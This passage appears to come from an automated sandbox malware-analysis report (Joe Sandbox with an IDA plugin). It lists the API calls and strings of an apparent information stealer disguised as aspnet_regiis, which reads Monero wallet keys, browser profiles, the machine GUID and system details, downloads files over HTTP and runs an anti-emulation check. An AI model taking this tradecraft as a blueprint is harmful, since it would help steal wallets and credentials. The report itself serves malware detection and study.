                                                                                                                              • Part of subcall function 00410C85: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                              • Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                            • ExitProcess.KERNEL32 ref: 004013E3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$HeapProcess_memset$AllocateComputerExitName
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2891980384-0
                                                                                                                            • Opcode ID: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
                                                                                                                            • Instruction ID: 239c304b61717195b0da288002eafcd0eca44a14d3e88ecdb176445cbc2bad3c
                                                                                                                            • Opcode Fuzzy Hash: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
                                                                                                                            • Instruction Fuzzy Hash: BD4196B2D4422C66DB20DB719C59FDB7BAC9F18310F5005A3A9D8F3181D67CDA84CB98
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                            • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
                                                                                                                            • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
                                                                                                                            • wsprintfA.USER32 ref: 004112DD
                                                                                                                            • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
                                                                                                                            • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00411347
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00411446
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00411466
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00411472
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                                                            • String ID: - $%s\%s$?
                                                                                                                            • API String ID: 2394436309-3278919252
                                                                                                                            • Opcode ID: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
                                                                                                                            • Instruction ID: a1c3be3d6f3fdb40de360404d346c16f4973fffda027df273c7b2494bd9b7707
                                                                                                                            • Opcode Fuzzy Hash: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
                                                                                                                            • Instruction Fuzzy Hash: A861F6B590022C9BEF21DB15DD84EDAB7B9AB44708F1042E6A608A2121DF35AFC9CF54
                                                                                                                            APIs
                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
                                                                                                                            • wsprintfA.USER32 ref: 00410AA7
                                                                                                                            • lstrcatA.KERNEL32(00000000,00436E3C), ref: 00410AB6
                                                                                                                              • Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                              • Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
                                                                                                                              • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                              • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00410ACD
                                                                                                                              • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                                                                                              • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                                                                                            • lstrcatA.KERNEL32(00000000,00000000), ref: 00410AF0
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                                                            • String ID: wA$:\$C$QuBi
                                                                                                                            • API String ID: 1856320939-1441494722
                                                                                                                            • Opcode ID: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
                                                                                                                            • Instruction ID: d36f890e74e7e8ef669b83a96deb31b174d36e7948efbde015f1e97a0a99ead9
                                                                                                                            • Opcode Fuzzy Hash: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
                                                                                                                            • Instruction Fuzzy Hash: B941AFB1A042289BCB249F749D85ADEBAB9EF19308F0000EAF109E3121E6758FD58F54
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                              • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                              • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406836
                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 00406856
                                                                                                                            • InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00406877
                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406892
                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004068C8
                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 004068F8
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00406923
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0040692A
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00406936
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                            • String ID: <+A
                                                                                                                            • API String ID: 2507841554-2778417545
                                                                                                                            • Opcode ID: 856b629bf82c4ff1a83c675378c3e7c10b8657cdf3afe6ec6eeb97d6b7c5d7bf
                                                                                                                            • Instruction ID: 1d44a0941bf69239cbc718c5fc054d573873141a30687fa59e6c761baef87c5b
                                                                                                                            • Opcode Fuzzy Hash: 856b629bf82c4ff1a83c675378c3e7c10b8657cdf3afe6ec6eeb97d6b7c5d7bf
                                                                                                                            • Instruction Fuzzy Hash: 22411CB1900128ABDF20DB21DD49BDA7BB9EB04315F1040B6BB09B21A1D6359E958FA9
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                              • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                              • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                              • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                              • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                              • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                              • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00416925
                                                                                                                              • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                            • StrStrA.SHLWAPI(00000000,?), ref: 0041693A
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00416949
                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 00416962
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                            • API String ID: 4174444224-1526165396
                                                                                                                            • Opcode ID: df153083d6535c7c34a5befce146155da6869fd2f995a743f7612deb0ce2170b
                                                                                                                            • Instruction ID: f999f3c62c0b23b7ff363c4994354db6f8ba44fc0c3398813b2d55053c878ef3
                                                                                                                            • Opcode Fuzzy Hash: df153083d6535c7c34a5befce146155da6869fd2f995a743f7612deb0ce2170b
                                                                                                                            • Instruction Fuzzy Hash: 6021E571910204ABCB10BB75DC469DD77B8AF04308F11512BFC05E3191DB7DD9858F99
                                                                                                                            APIs
                                                                                                                            • StrCmpCA.SHLWAPI(0094C481), ref: 0040EAF9
                                                                                                                            • StrCmpCA.SHLWAPI(0094C481), ref: 0040EB56
                                                                                                                            • StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0040EE1D
                                                                                                                            • StrCmpCA.SHLWAPI(0094C481), ref: 0040EC33
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                            • StrCmpCA.SHLWAPI(0094C481), ref: 0040ECE3
                                                                                                                            • StrCmpCA.SHLWAPI(0094C481), ref: 0040ED40
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpy
                                                                                                                            • String ID: Stable\$ Stable\$firefox
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00401ADC
                                                                                                                              • Part of subcall function 00401A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                                                              • Part of subcall function 00401A51: HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                                                              • Part of subcall function 00401A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                                                              • Part of subcall function 00401A51: RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                                                              • Part of subcall function 00401A51: RegCloseKey.ADVAPI32(00401AE9), ref: 00401AAD
                                                                                                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00401AF1
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00401AFE
                                                                                                                            • lstrcatA.KERNEL32(?,.keys), ref: 00401B19
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                              • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00401C2A
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                              • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                              • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                              • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                              • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00401C9D
                                                                                                                              • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                              • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Filelstrcpy$lstrcat$AllocCloseCreateHeaplstrlen$CopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
                                                                                                                            • String ID: .keys$\Monero\wallet.keys
                                                                                                                            APIs
                                                                                                                            • lstrcatA.KERNEL32(?,?,00000000,?), ref: 00415E86
                                                                                                                              • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00415EA3
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00415EC2
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00415ED6
                                                                                                                            • lstrcatA.KERNEL32(?), ref: 00415EE9
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00415EFD
                                                                                                                            • lstrcatA.KERNEL32(?), ref: 00415F10
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                              • Part of subcall function 00415B0B: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B30
                                                                                                                              • Part of subcall function 00415B0B: HeapAlloc.KERNEL32(00000000), ref: 00415B37
                                                                                                                              • Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415B50
                                                                                                                              • Part of subcall function 00415B0B: FindFirstFileA.KERNEL32(?,?), ref: 00415B67
                                                                                                                              • Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A98), ref: 00415B88
                                                                                                                              • Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A9C), ref: 00415BA2
                                                                                                                              • Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415BC9
                                                                                                                              • Part of subcall function 00415B0B: CopyFileA.KERNEL32(?,?,00000001), ref: 00415C86
                                                                                                                              • Part of subcall function 00415B0B: DeleteFileA.KERNEL32(?), ref: 00415CA9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$File$Heapwsprintf$AllocAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
                                                                                                                            • String ID: LzA
                                                                                                                            APIs
                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB52
                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB7E
                                                                                                                            • _memset.LIBCMT ref: 0040FBC1
                                                                                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FD17
                                                                                                                              • Part of subcall function 0040F030: _memmove.LIBCMT ref: 0040F04A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: OpenProcess_memmove_memset
                                                                                                                            • String ID: N0ZWFt
                                                                                                                            APIs
                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                            • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                            • LocalFree.KERNEL32(0040ECBC,?,?,?,?,0040E756,?,?,?), ref: 0040802B
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                            • String ID: V@
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00411607
                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
                                                                                                                            • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?), ref: 00411657
                                                                                                                            • CharToOemA.USER32(?,?), ref: 0041166B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: CharCloseOpenQueryValue_memset
                                                                                                                            • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                                                            • RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                                                            • RegCloseKey.ADVAPI32(00401AE9), ref: 00401AAD
                                                                                                                            Strings
                                                                                                                            • SOFTWARE\monero-project\monero-core, xrefs: 00401A7F
                                                                                                                            • wallet_path, xrefs: 00401A9C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                            • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B79
                                                                                                                            • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B95
                                                                                                                            • RegCloseKey.ADVAPI32(00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B9E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                            • String ID: Windows 11
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BBD
                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BC4
                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BE2
                                                                                                                            • RegQueryValueExA.KERNEL32(00436888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ), ref: 00410BFD
                                                                                                                            • RegCloseKey.ADVAPI32(00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410C06
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                            • String ID: CurrentBuildNumber
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 004156A4
                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 004156C4
                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 004156EA
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004156F6
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00415725
                                                                                                                            • lstrcatA.KERNEL32(?), ref: 00415738
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$CloseOpenQueryValue_memset
                                                                                                                            • String ID:
                                                                                                                            APIs
                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                                                                                            • CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 0041178E
                                                                                                                            • _wtoi64.MSVCRT ref: 004117C1
                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 004117DA
                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 181426013-0
                                                                                                                            • Opcode ID: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
                                                                                                                            • Instruction ID: 49cd324ebe81867dc14fdb11462f5a122b1e841d4163eb6196de4943798d3ef6
                                                                                                                            • Opcode Fuzzy Hash: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
                                                                                                                            • Instruction Fuzzy Hash: 71115170A0424ADFCB019FA4CC999EEBBB5AF48300F54417EF215E72A0CB355945CB59
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
                                                                                                                            • _memset.LIBCMT ref: 004010D0
                                                                                                                            • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,004184CC), ref: 00401100
                                                                                                                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
                                                                                                                            • ExitProcess.KERNEL32 ref: 00401112
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1859398019-0
                                                                                                                            • Opcode ID: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
                                                                                                                            • Instruction ID: 2816971d78f640c5210f5c3df2c68b6a36055d88f9abb901e61d14fe4f69d22d
